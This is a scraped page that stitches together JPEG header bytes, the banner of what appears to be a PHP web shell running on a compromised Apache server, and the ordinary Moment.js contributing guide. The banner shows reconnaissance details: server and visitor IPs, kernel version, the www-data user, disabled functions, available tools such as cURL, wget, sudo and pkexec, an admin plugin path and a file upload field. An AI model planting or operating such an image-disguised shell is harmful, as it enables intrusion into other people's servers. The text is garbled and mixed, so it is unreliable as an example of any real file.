����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 3.15.238.90 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/admin/assets/plugins/moment/ |
Upload File : |
All pull requests to the `master` branch will be closed. ======================================================== Please submit all pull requests to the `develop` branch. Language translations will not be merged without unit tests. ============================================================ See [the english unit tests](https://github.com/timrwood/moment/blob/develop/test/lang/en.js) for an example. Submitting Issues ================= If you are submitting a bug, please create a [jsfiddle](http://jsfiddle.net/) demonstrating the issue. Contributing ============ To contribute, fork the library and install grunt. npm install grunt -g You can add tests to the files in `/test/moment` or add a new test file if you are adding a new feature. To run the tests, do `grunt` to run all tests. To check the filesize, you can use `grunt size`. To minify all the files, use `grunt release`. If your code passes the unit tests (including the ones you wrote), submit a pull request. Submitting pull requests ======================== Moment.js now uses [git-flow](https://github.com/nvie/gitflow). If you're not familiar with git-flow, please read up on it, you'll be glad you did. When submitting new features, please create a new feature branch using `git flow feature start <name>` and submit the pull request to the `develop` branch. Pull requests for enhancements for features should be submitted to the `develop` branch as well. When submitting a bugfix, please check if there is an existing bugfix branch. If the latest stable version is `1.5.0`, the bugfix branch would be `hotfix/1.5.1`. All pull requests for bug fixes should be on a `hotfix` branch, unless the bug fix depends on a new feature. The `master` branch should always have the latest stable version. When bugfix or minor releases are needed, the develop/hotfix branch will be merged into master and released.